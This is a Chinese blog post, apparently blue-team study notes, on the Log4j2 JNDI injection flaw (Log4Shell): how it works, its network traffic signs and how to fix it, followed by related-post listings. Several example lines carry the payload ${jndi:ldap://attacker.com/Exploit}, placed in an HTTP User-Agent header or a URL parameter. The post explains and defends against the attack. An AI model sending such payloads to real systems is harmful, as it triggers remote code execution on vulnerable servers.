Log4j2原理与流量特征

于 2025-03-10 12:30:00 发布
阅读量1.9k 收藏 40
点赞数 28
分类专栏: # HVV 网络空间安全 文章标签: log4j 笔记 安全性测试 安全威胁分析 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/146133575
版权

Log4j2 漏洞概述

Log4j2 是 Apache 软件基金会开发的一个日志框架,广泛用于 Java 应用中记录运行时日志。漏洞主要源于 Log4j2 的日志处理功能中,某些特性(如 JNDI 注入)被攻击者滥用,从而引发严重的远程代码执行(RCE)漏洞。

漏洞原理

Apache Log4j2 的 JNDI Lookup 功能允许通过日志消息中的 JNDI 名称引用外部资源。攻击者可以构造包含恶意 JNDI 名称的日志消息,通过网络发送给受影响的应用程序。当 Log4j2 解析日志消息时,会尝试加载远程恶意脚本,从而RCE漏洞产生

JNDI 注入

  • JNDI(Java Naming and Directory Interface) 是 Java 提供的一种目录服务 API,用于查找和加载资源或对象。
  • Log4j2 在日志功能中支持动态解析类似 ${} 的占位符字符串,提供了强大的灵活性。
  • 当日志字符串中包含 ${jndi:ldap://malicious-server} 时,Log4j2 会尝试通过 JNDI 去远程加载资源。如果目标是攻击者控制的恶意 LDAP 服务器,则攻击者可以返回恶意的 Java 类字节码,导致远程代码执行。

漏洞触发过程

  1. 攻击者构造一个恶意日志字符串,例如:

    ${jndi:ldap://attacker.com/Exploit}

  2. 该字符串被传递到应用程序的日志处理逻辑(例如 logger.info())。

  3. Log4j2 解析日志字符串中的 JNDI 表达式,尝试通过 LDAP 或其他协议加载远程对象。

  4. 如果恶意服务器返回一个恶意 Java 类文件,Log4j2 会加载并执行该类的字节码,触发 RCE。

流量特征

  • 请求头中的useragent头或者是referer或含有包含 ${jndi:...} 的形式,后续跟上攻击者控制的远程服务器地址,还有一些协议协议关键字,例如ldap:// , rmi:// , dns://

    • image

  • HTTP请求中包含特定的User-Agent头,如“ Log4j2”或“ Log4jAPI/2.0.8”等,可能还有有一些恶意的密文

  • 攻击成功后可能会有,“JNDI lookup successful”,${env:os.name}${env:hostname}等动态信息

漏洞利用方式

常见的攻击场景

  1. 通过 HTTP 请求头
    攻击者将恶意字符串注入到 HTTP 请求头(如 User-AgentReferer)中。例如:

    GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://attacker.com/Exploit}

  2. 通过 HTTP 请求参数
    恶意字符串被注入到 URL 参数中。例如:

    http://victim.com/search?query=${jndi:ldap://attacker.com/Exploit}

漏洞修复

  1. 升级 Log4j2 版本
  2. 禁用 JNDI 功能
  3. 移除 JndiLookup
  4. 升级依赖软件
Log4j2滚动策略深度解析:保持日志轻量高效
fudaihb的博客
05-15 2070
在本文中,我们将深入探讨 Log4j2 的滚动策略。我们将从基本概念入手,介绍文件滚动机制的必要性和作用,详细解析 Log4j2 中的各种滚动策略,并提供具体的配置方法和实例。通过全面了解这些内容,您将能够更好地掌控日志系统,使其既轻量高效,又具备足够的灵活性和扩展性。无论您是系统运维工程师、软件开发人员,还是日志系统的设计者,相信本文都能为您提供实用的指导和宝贵的参考。
log4j2漏洞复现(CVE-2021-44228)
最新发布
人们并不感谢罗辑
08-16 2153
log4j2是一个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 1068
前言 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 2021年12月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞
Log4j 2的特性和改进
weixin_30562507的博客
10-03 136
Log4j 2的特性和改进 本文译自: http://logging.apache.org/log4j/2.x/index.html 详细目录 Apache Log4j 2 中文文档 Log4j 2的一些特性和改进 API分离 Log4j 2的API实现是分离的,在保证向前兼容的前提下,这让开发人员使用其类...
Log4j2漏洞复现分析
xiaolinzi176的博客
12-12 3108
漏洞复现: 结果如下: 可见并不是打印的param具体参数信息,而是打印了服务器版本信息,这样就会产生注入的漏洞,此次漏洞就是由于JNDI导致的,下面介绍下具体的JNDI注入 JNDI:RMI注入 在jdk8u1217u1316u141版本开始默认com.sun.jndi.rmi.object.trustURLCodebase设置为false,rmi加载远程的字节码不会执行成功。 ...
log4j2 远程代码执行漏洞复现(CVE-2021-44228)
热门推荐
Welcome To Myon'Blog !
03-08 1万+
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
【Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 3020
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
如何监控 Log4j2 异步日志遇到写入瓶颈
hashcon
07-23 1010
如何监控 Log4j2 异步日志遇到写入瓶颈 在之前的一篇文章中(一次鞭辟入里的 Log4j2 异步日志输出阻塞问题的定位),我们详细分析了一个经典的 Log4j2 异步日志阻塞问题的定位,主要原因还是日志文件写入慢了。并且比较深入的分析Log4j2 异步日志的原理,最后给出了一些解决方案。 新的问题 - 如何更好的应对这种情况? 之前提出的解决方案仅仅是针对之前定位的问题的优化,但是随着业务发展,日志量肯定会更多,大量的日志可能导致写入日志成为新的性能瓶颈。对于这种情况,我们需要监控。 首先想到的是
《漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1999
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
log4j2漏洞复现
The_Epiphany的博客
04-19 460
1.该漏洞的主要成因是LDAP对外部站点资源的访问,导致下载恶意代码,可以禁止lookup的出栈查询。2.对"jndi:ladp://"、“jndi:rmi”等特征字符过滤。3.限制对外网的访问。4.配置jndi可调用协议。
Java的常用日志技术(三)Log4j2Log4j2slfj整合详解
qq_41946216的博客
06-04 4029
log4j2
Apache Log4j2 远程代码执行漏洞分析+检测+防护
weixin_46622976的博客
12-10 1万+
分析: Apache Log4j2是一款开源的Java日志框架,被广泛地应用在中间件、开发框架Web应用中,用来记录日志信息。由于ApacheLog4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在目标服务器上执行任意代码。漏洞PoC已在网上公开,默认配置即可进行利用,该漏洞影响范围极广,建议相关用户尽快采取措施进行排查防护。 根据Iog4j的用途和复现的情况来看,攻击入口取决于Iog4j从线上业务的哪些地方取数据放入 logger.error,...
Wireshark TS | 网络数据包角度看 log4j
7ACE的博客
12-31 5699
Wireshark TS | 网络数据包角度看 log4j
常见Webshell&重大漏洞的流量特征(附解密流量工具)
Python_0011的博客
11-10 7957
攻防演练中,经常会看到一些加密的流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,附流量解密工具。
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4604
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
全网连夜修复的Log4j漏洞,如何做
superjava_的博客
12-29 2802
Apache Log4j2 远程代码执行漏洞的问题最近闹得沸沸扬扬的,很多人都被大半夜叫起来紧急修复这跟问题。 有很多人在微信上问我:这种漏洞还能怎么修?下次有问题还要再升级版本吗?有没有啥一劳永逸的办法?就没啥办法避免吗? 其实,是有的。有一种技术,可以针对这类漏洞做定向拦截。可以让开发者不用急急忙忙修这个漏洞,甚至你如果完全不想修都可以。 这就是RASP技术。 其实这个技术已经诞生很久了,在安全圈也应用很广泛。应用范围也很广泛了。 RASP RASP 是 Runtime Applicatio
log4j反序列化漏洞复现
qq_52263650的博客
05-31 1410
Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
hw蓝队初级面试总结
G208_522的博客
05-27 1万+
1、sql注入原理、分类、绕过 原理:产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。 分类:我们可以把sql注入直接的分为字符型和数字型,主要特点就是在进行sql注入的时候是否需要闭合传参的单引号,不需要闭合说明是数值型,反之就是字符型;还可以将sql注入分为有回显的注入和无回显的注入,无回显的注入又别称为盲注,盲注有三大
Log4j2 2.15.0版本漏洞修复详解
“Log4Shell”漏洞原理在于log4j2在解析日志消息中包含的JNDI(Java Naming and Directory Interface)数据时,会尝试通过网络连接到攻击者控制的服务器。由于这个过程并不需要用户干预,因此攻击者可以远程触发这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值